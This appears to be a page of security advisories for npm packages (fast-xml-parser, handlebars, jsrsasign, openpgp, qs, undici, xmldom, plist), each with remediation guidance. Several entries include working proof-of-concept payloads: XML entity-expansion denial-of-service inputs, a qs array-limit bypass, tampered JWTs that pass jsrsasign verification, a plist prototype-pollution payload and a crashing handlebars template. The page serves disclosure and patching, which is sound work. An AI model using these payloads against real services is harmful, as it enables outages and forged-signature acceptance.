Find, fix and prevent vulnerabilities in your code.

Overview

fast-xml-parser is a Validate XML, Parse XML, Build XML without C/C++ based libraries

Affected versions of this package are vulnerable to XML Entity Expansion in replaceEntitiesValue() when handling excessive DOCTYPE input. An attacker can cause excessive resource consumption and make the application unresponsive by submitting malicious XML input with large text entities referenced multiple times. This is a bypass for Billion Laughs protection in DocTypeReader.js, which prevents excessive referencing within and entity, but doesn't prevent repeated expansion of large entities.

Workaround

This vulnerability can be mitigated by disabling DOCTYPE parsing using the processEntities: false option.

PoC

const { XMLParser } = require('fast-xml-parser');

const entity = 'A'.repeat(1000);
const refs = '&big;'.repeat(100);
const xml = `<!DOCTYPE foo [<!ENTITY big "${entity}">]><root>${refs}</root>`;

console.time('parse');
new XMLParser().parse(xml);
console.timeEnd('parse');

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.

Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.

One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.

When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.

Two common types of DoS vulnerabilities:

• High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.

• Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm ws package

Remediation

Upgrade fast-xml-parser to version 4.5.4, 5.3.6 or higher.

References

• GitHub Commit
• GitHub Release

Overview

fast-xml-parser is a Validate XML, Parse XML, Build XML without C/C++ based libraries

Affected versions of this package are vulnerable to XML Entity Expansion in the replaceEntitiesValue() function, which doesn't protect unlimited expansion of numeric entities the way it does DOCTYPE data (as described and fixed for CVE-2026-26278). An attacker can exhaust system memory and CPU resources by submitting XML input containing a large number of numeric character references - &#NNN; and &#xHH;.

Note: This is a bypass for the fix to the DOCTYPE expansion vulnerability in 5.3.6.

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.

Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.

One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.

When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.

Two common types of DoS vulnerabilities:

• High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.

• Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm ws package

Remediation

Upgrade fast-xml-parser to version 5.5.6 or higher.

References

• GitHub Commit
• GitHub Release

Overview

handlebars is an extension to the Mustache templating language.

Affected versions of this package are vulnerable to Improper Check for Unusual or Exceptional Conditions through the registerDecorator path in lib/handlebars/compiler/javascript-compiler.js. An attacker can crash the Node.js process by supplying a template with malformed or unregistered decorator syntax, causing the compiled template to call an undefined decorator as a function. This affects applications that compile untrusted templates at request time, especially when the compile/render call is not wrapped in try/catch. A single malicious template such as {{*n}} can trigger an unhandled TypeError and terminate the process.

Workarounds

• Wrap compilation and rendering in try/catch.
• Validate template input before passing it to compile(), and reject decorator syntax if decorators are not used.
• Use pre-compilation at build time and avoid calling compile() on request-time input.

Remediation

Upgrade handlebars to version 4.7.9 or higher.

References

• GitHub Commit
• Maintainer's Advisory

Overview

jsrsasign is a free pure JavaScript cryptographic library.

Affected versions of this package are vulnerable to Incorrect Conversion between Numeric Types due to handling negative exponents in ext/jsbn2.js. An attacker can force the computation of incorrect modular inverses and break signature verification by calling modPow with a negative exponent.

Remediation

Upgrade jsrsasign to version 11.1.1 or higher.

References

• GitHub Commit
• GitHub Gist
• GitHub PR

Overview

jsrsasign is a free pure JavaScript cryptographic library.

Affected versions of this package are vulnerable to Infinite loop via the bnModInverse function in ext/jsbn2.js when the BigInteger.modInverse implementation receives zero or negative inputs, allowing an attacker to hang the process permanently by supplying such crafted values (e.g., modInverse(0, m) or modInverse(-1, m)).

Remediation

Upgrade jsrsasign to version 11.1.1 or higher.

References

• GitHub Commit
• GitHub Gist
• GitHub PR

Overview

openpgp is a JavaScript implementation of the OpenPGP protocol.

Affected versions of this package are vulnerable to Improper Verification of Cryptographic Signature through the openpgp.verify or openpgp.decrypt functions. An attacker can manipulate the message content to appear as legitimately signed by constructing a message with any data of their choice, using a valid signature from a different message.

Note:

This is only exploitable if the attacker has access to a valid signature and the plaintext data that was legitimately signed.

Workaround

This vulnerability can be mitigated by extracting the message and signatures from the message returned by openpgp.readMessage, and verifying each signature as a detached signature by passing the signature and a new message containing only the data (created using openpgp.createMessage) to openpgp.verify. For signed+encrypted messages, decrypt and verify the message in two steps, by first calling openpgp.decrypt without verificationKeys, and then passing the returned signature(s) and a new message containing the decrypted data (created using openpgp.createMessage) to openpgp.verify.

Remediation

Upgrade openpgp to version 5.11.3, 6.1.1 or higher.

References

• GitHub Commit
• GitHub Commit
• GitHub Commit
• GitHub Release
• GitHub Release
• PoC

Overview

qs is a querystring parser that supports nesting and arrays, with a depth limit.

Affected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling via improper enforcement of the arrayLimit option in bracket notation parsing. An attacker can exhaust server memory and cause application unavailability by submitting a large number of bracket notation parameters - like a[]=1&a[]=2 - in a single HTTP request.

PoC

const qs = require('qs');
const attack = 'a[]=' + Array(10000).fill('x').join('&a[]=');
const result = qs.parse(attack, { arrayLimit: 100 });
console.log(result.a.length);  // Output: 10000 (should be max 100)

Remediation

Upgrade qs to version 6.14.1 or higher.

References

• GitHub Commit

Overview

undici is an An HTTP/1.1 client, written from scratch for Node.js

Affected versions of this package are vulnerable to Improper Handling of Highly Compressed Data (Data Amplification) in the PerMessageDeflate.decompress() method of the permessage-deflate extension. An attacker can cause excessive memory usage by sending specially crafted compressed WebSocket frames that decompress to a very large size, potentially leading to process crashes or unresponsiveness.

Remediation

Upgrade undici to version 6.24.0, 7.24.0 or higher.

References

• GitHub Commit
• HackerOne Report

Overview

undici is an An HTTP/1.1 client, written from scratch for Node.js

Affected versions of this package are vulnerable to Uncaught Exception in the ByteParser when handling a specially crafted WebSocket frame with an extremely large 64-bit length. An attacker can cause the process to terminate unexpectedly by sending such a frame, resulting in a fatal TypeError and service disruption.

Remediation

Upgrade undici to version 6.24.0, 7.24.0 or higher.

References

• GitHub Commit
• HackerOne Report
• Red Hat Bugzilla Bug

Overview

undici is an An HTTP/1.1 client, written from scratch for Node.js

Affected versions of this package are vulnerable to Uncaught Exception through improper validation of the server_max_window_bits parameter in the permessage-deflate extension. An attacker can cause the process to terminate unexpectedly by sending a maliciously crafted value outside the valid range, which triggers an unhandled exception when the client attempts to create a zlib InflateRaw instance.

Remediation

Upgrade undici to version 6.24.0, 7.24.0 or higher.

References

• GitHub Commit
• HackerOne Report

Overview

xmldom is an A pure JavaScript W3C standard-based (XML DOM Level 2 Core) DOMParser and XMLSerializer module.

Affected versions of this package are vulnerable to Prototype Pollution through the copy() function in dom.js. Exploiting this vulnerability is possible via the p variable.

DISPUTED This vulnerability has been disputed by the maintainers of the package. Currently the only viable exploit that has been demonstrated is to pollute the target object (rather then the global object which is generally the case for Prototype Pollution vulnerabilities) and it is yet unclear if this limited attack vector exposes any vulnerability in the context of this package.

See the linked GitHub Issue for full details on the discussion around the legitimacy and potential revocation of this vulnerability.

Details

Prototype Pollution is a vulnerability affecting JavaScript. Prototype Pollution refers to the ability to inject properties into existing JavaScript language construct prototypes, such as objects. JavaScript allows all Object attributes to be altered, including their magical attributes such as __proto__, constructor and prototype. An attacker manipulates these attributes to overwrite, or pollute, a JavaScript application object prototype of the base object by injecting other values. Properties on the Object.prototype are then inherited by all the JavaScript objects through the prototype chain. When that happens, this leads to either denial of service by triggering JavaScript exceptions, or it tampers with the application source code to force the code path that the attacker injects, thereby leading to remote code execution.

There are two main ways in which the pollution of prototypes occurs:

• Unsafe Object recursive merge

• Property definition by path

Unsafe Object recursive merge

The logic of a vulnerable recursive merge function follows the following high-level model:

merge (target, source)

  foreach property of source

    if property exists and is an object on both the target and the source

      merge(target[property], source[property])

    else

      target[property] = source[property]

When the source object contains a property named __proto__ defined with Object.defineProperty() , the condition that checks if the property exists and is an object on both the target and the source passes and the merge recurses with the target, being the prototype of Object and the source of Object as defined by the attacker. Properties are then copied on the Object prototype.

Clone operations are a special sub-class of unsafe recursive merges, which occur when a recursive merge is conducted on an empty object: merge({},source).

lodash and Hoek are examples of libraries susceptible to recursive merge attacks.

Property definition by path

There are a few JavaScript libraries that use an API to define property values on an object based on a given path. The function that is generally affected contains this signature: theFunction(object, path, value)

If the attacker can control the value of “path”, they can set this value to __proto__.myValue. myValue is then assigned to the prototype of the class of the object.

Types of attacks

There are a few methods by which Prototype Pollution can be manipulated:

Affected environments

The following environments are susceptible to a Prototype Pollution attack:

• Application server

• Web server

• Web browser

How to prevent

1. Freeze the prototype— use Object.freeze (Object.prototype).

2. Require schema validation of JSON input.

3. Avoid using unsafe recursive merge functions.

4. Consider using objects without prototypes (for example, Object.create(null)), breaking the prototype chain and preventing pollution.

5. As a best practice use Map instead of Object.

For more information on this vulnerability type:

Arteau, Olivier. “JavaScript prototype pollution attack in NodeJS application.” GitHub, 26 May 2018

Remediation

There is no fixed version for xmldom.

References

• GitHub Commit
• GitHub Issue
• GitHub Release
• Vulnerable Code
• Vulnerable Code

Overview

handlebars is an extension to the Mustache templating language.

Affected versions of this package are vulnerable to Improper Encoding or Escaping of Output through the CLI precompiler in lib/precompiler.js. An attacker can execute arbitrary JavaScript in the generated bundle by supplying crafted template filenames or CLI options such as --namespace, --commonjs, --handlebarPath, or --map. The issue affects the precompiler output path used by bin/handlebars / lib/precompiler.js, where untrusted names and option values were concatenated into emitted JavaScript without escaping.

Workarounds

• Validate template filenames and CLI option values before invoking the precompiler and reject values containing JavaScript string-escaping or statement-breaking characters.
• Use a fixed, trusted namespace string rather than passing it from the command line in automated pipelines.
• Run the precompiler in a sandboxed environment with limited write access.

Remediation

Upgrade handlebars to version 4.7.9 or higher.

References

• GitHub Commit
• Maintainer's Advisory

Overview

fast-xml-parser is a Validate XML, Parse XML, Build XML without C/C++ based libraries

Affected versions of this package are vulnerable to Improper Validation of Specified Quantity in Input in the DocTypeReader component when the maxEntityCount or maxEntitySize configuration options are explicitly set to 0. Due to JavaScript's falsy evaluation, the intended limits are bypassed. An attacker can cause unbounded entity expansion and exhaust server memory by supplying crafted XML input containing numerous large entities.

Note:

This is only exploitable if the application is configured with processEntities enabled and either maxEntityCount or maxEntitySize set to 0.

PoC

const { XMLParser } = require("fast-xml-parser");

// Developer intends: "no entities allowed at all"
const parser = new XMLParser({
  processEntities: {
    enabled: true,
    maxEntityCount: 0,    // should mean "zero entities allowed"
    maxEntitySize: 0       // should mean "zero-length entities only"
  }
});

// Generate XML with many large entities
let entities = "";
for (let i = 0; i < 1000; i++) {
  entities += `<!ENTITY e${i} "${"A".repeat(100000)}">`;
}

const xml = `<?xml version="1.0"?>
<!DOCTYPE foo [
  ${entities}
]>
<foo>&e0;</foo>`;

// This should throw "Entity count exceeds maximum" but does not
try {
  const result = parser.parse(xml);
  console.log("VULNERABLE: parsed without error, entities bypassed limits");
} catch (e) {
  console.log("SAFE:", e.message);
}

// Control test: setting maxEntityCount to 1 correctly blocks
const safeParser = new XMLParser({
  processEntities: {
    enabled: true,
    maxEntityCount: 1,
    maxEntitySize: 100
  }
});

try {
  safeParser.parse(xml);
  console.log("ERROR: should have thrown");
} catch (e) {
  console.log("CONTROL:", e.message);  // "Entity count (2) exceeds maximum allowed (1)"
}

Remediation

Upgrade fast-xml-parser to version 5.5.7 or higher.

References

• GitHub Advisory
• GitHub Commit

Overview

undici is an An HTTP/1.1 client, written from scratch for Node.js

Affected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling in the deduplication-handler component when interceptors.deduplicate() is enabled. An attacker can cause excessive memory consumption and potential application termination by sending large or chunked responses along with concurrent identical requests from an untrusted endpoint.

Remediation

Upgrade undici to version 7.24.0 or higher.

References

• GitHub Commit
• HackerOne Report
• Red Hat Bugzilla Bug

Overview

fast-xml-parser is a Validate XML, Parse XML, Build XML without C/C++ based libraries

Affected versions of this package are vulnerable to Incorrect Regular Expression in the entity parsing RegEx in DOCTYPE declarations. An attacker can inject arbitrary values that override built-in XML entities by crafting entity names containing ., which is interpreted as a regex wildcard, allowing malicious content to be substituted in place of standard entities when the XML is parsed and subsequently rendered or used in sensitive contexts.

Remediation

Upgrade fast-xml-parser to version 4.5.4, 5.3.5 or higher.

References

• GitHub Commit
• GitHub Commit
• GitHub Release

Overview

jsrsasign is a free pure JavaScript cryptographic library.

Affected versions of this package are vulnerable to Improper Verification of Cryptographic Signature when JWS or JWT signature with non Base64URL encoding special characters or number escaped characters may be validated as valid by mistake.

Workaround:

Validate JWS or JWT signature if it has Base64URL and dot safe string before executing JWS.verify() or JWS.verifyJWT() method.

PoC:

var KJUR = require('jsrsasign');
var rsu = require('jsrsasign-util');

// jsrsasign@10.5.24

//// creating valid hs256 jwt - code used to get valid hs256 jwt.
// var oHeader = {alg: 'HS256', typ: 'JWT'};
// // Payload
// var oPayload = {};
// var tNow = KJUR.jws.IntDate.get('now');
// var tEnd = KJUR.jws.IntDate.get('now + 1year');
// oPayload.iss = "https://urldefense.proofpoint.com/v2/url?u=http-3A__foo.com&d=DwIGAg&c=wwDYKmuffy0jxUGHACmjfA&r=3J3pjDmBp7lIUZbkdHkHLg&m=CP36zULZ4
oa9S7i8rFsa5Rei7n32BgBaGjoG8lCiqO-pm9ZIzxG9adHdbUE4qski&s=eMfp9lSTyBb95UqdO_sO3ukTKlGihPESsUm5F4yotGk&e= ";
// oPayload.sub = "mailto:mike@foo.com";
// oPayload.nbf = tNow;
// oPayload.iat = tNow;
// oPayload.exp = tEnd;
// oPayload.jti = "id123456";
// oPayload.aud = "https://urldefense.proofpoint.com/v2/url?u=http-3A__foo.com_employee&d=DwIGAg&c=wwDYKmuffy0jxUGHACmjfA&r=3J3pjDmBp7lIUZbkdHkHLg&m=C
P36zULZ4oa9S7i8rFsa5Rei7n32BgBaGjoG8lCiqO-pm9ZIzxG9adHdbUE4qski&s=bxlm95BhVv7dbGuy_vRD4JBci6ODNdgOU7Q7bNPkv48&e= ";
// // Sign JWT, password=616161
// var sHeader = JSON.stringify(oHeader);
// var sPayload = JSON.stringify(oPayload);
// var sJWT = KJUR.jws.JWS.sign("HS256", sHeader, sPayload, "616161");


//verifying valid and invalid hs256 jwt
//validjwt
var validJwt = "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJodHRwOi8vZm9vLmNvbSIsInN1YiI6Im1haWx0bzp
taWtlQGZvby5jb20iLCJuYmYiOjE2NTUyMjk3MjksImlhdCI6MTY1NTIyOTcyOSwiZXhwIjoxNjg2NzY1NzI5LC
JqdGkiOiJpZDEyMzQ1NiIsImF1ZCI6Imh0dHA6Ly9mb28uY29tL2VtcGxveWVlIn0.eqrgPFuchnot7HgslW8S
1xQUkTDBW-_cyhrPgOOFRzI";
//invalid jwt with special signs
var invalidJwt1 = "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJodHRwOi8vZm9vLmNvbSIsInN1YiI6Im1haWx0bzp
taWtlQGZvby5jb20iLCJuYmYiOjE2NTUyMjk3MjksImlhdCI6MTY1NTIyOTcyOSwiZXhwIjoxNjg2NzY1NzI5LC
JqdGkiOiJpZDEyMzQ1NiIsImF1ZCI6Imh0dHA6Ly9mb28uY29tL2VtcGxveWVlIn0.eqrgPFuchno!@#$%^&*
()!@#$%^&*()!@#$%^&*()!@#$%^&*()t7HgslW8S1xQUkTDBW-_cyhrPgOOFRzI";
//invalid jwt with additional numbers and signs
var invalidJwt2 = "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJodHRwOi8vZm9vLmNvbSIsInN1YiI6Im1haWx0bzp
taWtlQGZvby5jb20iLCJuYmYiOjE2NTUyMjk3MjksImlhdCI6MTY1NTIyOTcyOSwiZXhwIjoxNjg2NzY1NzI5LC
JqdGkiOiJpZDEyMzQ1NiIsImF1ZCI6Imh0dHA6Ly9mb28uY29tL2VtcGxveWVlIn0.eqrgPFuchno\1\1\2\3\4
\2\2\3\2\1\2\222\3\1\1\2\2\2\2\2\2\2\2\2\2\2\2\222\23\2\2\2\2t7HgslW8S1xQUkTDBW-_cyhrPgOOFRzI";


var isValid = KJUR.jws.JWS.verifyJWT(validJwt, "616161", {alg: ['HS256']});
console.log("valid hs256 Jwt: " + isValid); //valid Jwt: true

//verifying invalid  1 hs256 jwt
var isValid = KJUR.jws.JWS.verifyJWT(invalidJwt1, "616161", {alg: ['HS256']});
console.log("invalid hs256  Jwt by special signs: " + isValid); //invalid Jwt  by special signs: true

//verifying invalid 2 hs256 jwt
var isValid = KJUR.jws.JWS.verifyJWT(invalidJwt2, "616161", {alg: ['HS256']});
console.log("invalid hs256  Jwt by additional numbers and slashes: " + isValid); //invalid Jwt by additional numbers and slashes: true

Remediation

Upgrade jsrsasign to version 10.5.25 or higher.

References

• GitHub Commit
• GitHub Release

Overview

xmldom is an A pure JavaScript W3C standard-based (XML DOM Level 2 Core) DOMParser and XMLSerializer module.

Affected versions of this package are vulnerable to XML Injection via the XMLSerializer() function. An attacker can manipulate the structure and integrity of generated XML documents by injecting attacker-controlled markup containing the CDATA terminator ]]> through CDATA section content, which is not properly validated or sanitized during serialization. This can result in unauthorized XML elements or attributes being inserted, potentially leading to business logic manipulation or privilege escalation in downstream consumers.

Remediation

There is no fixed version for xmldom.

References

• GitHub Advisory
• GitHub Commit
• GitHub Release
• GitHub Release

Overview

jsrsasign is a free pure JavaScript cryptographic library.

Affected versions of this package are vulnerable to Observable Discrepancy via the RSA PKCS#1.5 or RSAOAEP decryption process. An attacker can decrypt ciphertexts by exploiting the Marvin security flaw. Exploiting this vulnerability requires the attacker to have access to a large number of ciphertexts encrypted with the same key.

Workaround

The vulnerability can be mitigated by finding and replacing RSA and RSAOAEP decryption with another crypto library.

Remediation

Upgrade jsrsasign to version 11.0.0 or higher.

References

• GitHub Commit
• GitHub Issue
• Vulnerability Report

Overview

plist is a Mac OS X Plist parser/builder for Node.js and browsers.

Affected versions of this package are vulnerable to Prototype Pollution via the .parse(), exploiting this vulnerability may lead to Denial of Service (DoS) and Remote Code Execution.

PoC:

var plist = require('plist');
var xmlPollution = `
<plist version="1.0">
  <dict>
    <key>__proto__</key>
    <dict>
      <key>length</key>
      <string>polluted</string>
    </dict>
  </dict>
</plist>`;
console.log(plist.parse(xmlPollution).length); // polluted

Details

Prototype Pollution is a vulnerability affecting JavaScript. Prototype Pollution refers to the ability to inject properties into existing JavaScript language construct prototypes, such as objects. JavaScript allows all Object attributes to be altered, including their magical attributes such as __proto__, constructor and prototype. An attacker manipulates these attributes to overwrite, or pollute, a JavaScript application object prototype of the base object by injecting other values. Properties on the Object.prototype are then inherited by all the JavaScript objects through the prototype chain. When that happens, this leads to either denial of service by triggering JavaScript exceptions, or it tampers with the application source code to force the code path that the attacker injects, thereby leading to remote code execution.

There are two main ways in which the pollution of prototypes occurs:

• Unsafe Object recursive merge

• Property definition by path

Unsafe Object recursive merge

The logic of a vulnerable recursive merge function follows the following high-level model:

merge (target, source)

  foreach property of source

    if property exists and is an object on both the target and the source

      merge(target[property], source[property])

    else

      target[property] = source[property]

When the source object contains a property named __proto__ defined with Object.defineProperty() , the condition that checks if the property exists and is an object on both the target and the source passes and the merge recurses with the target, being the prototype of Object and the source of Object as defined by the attacker. Properties are then copied on the Object prototype.

Clone operations are a special sub-class of unsafe recursive merges, which occur when a recursive merge is conducted on an empty object: merge({},source).

lodash and Hoek are examples of libraries susceptible to recursive merge attacks.

Property definition by path

There are a few JavaScript libraries that use an API to define property values on an object based on a given path. The function that is generally affected contains this signature: theFunction(object, path, value)

If the attacker can control the value of “path”, they can set this value to __proto__.myValue. myValue is then assigned to the prototype of the class of the object.

Types of attacks

There are a few methods by which Prototype Pollution can be manipulated:

Affected environments

The following environments are susceptible to a Prototype Pollution attack:

• Application server

• Web server

• Web browser

How to prevent

1. Freeze the prototype— use Object.freeze (Object.prototype).

2. Require schema validation of JSON input.

3. Avoid using unsafe recursive merge functions.

4. Consider using objects without prototypes (for example, Object.create(null)), breaking the prototype chain and preventing pollution.

5. As a best practice use Map instead of Object.

For more information on this vulnerability type:

Arteau, Olivier. “JavaScript prototype pollution attack in NodeJS application.” GitHub, 26 May 2018

Remediation

Upgrade plist to version 3.0.4 or higher.

References

• GitHub Issue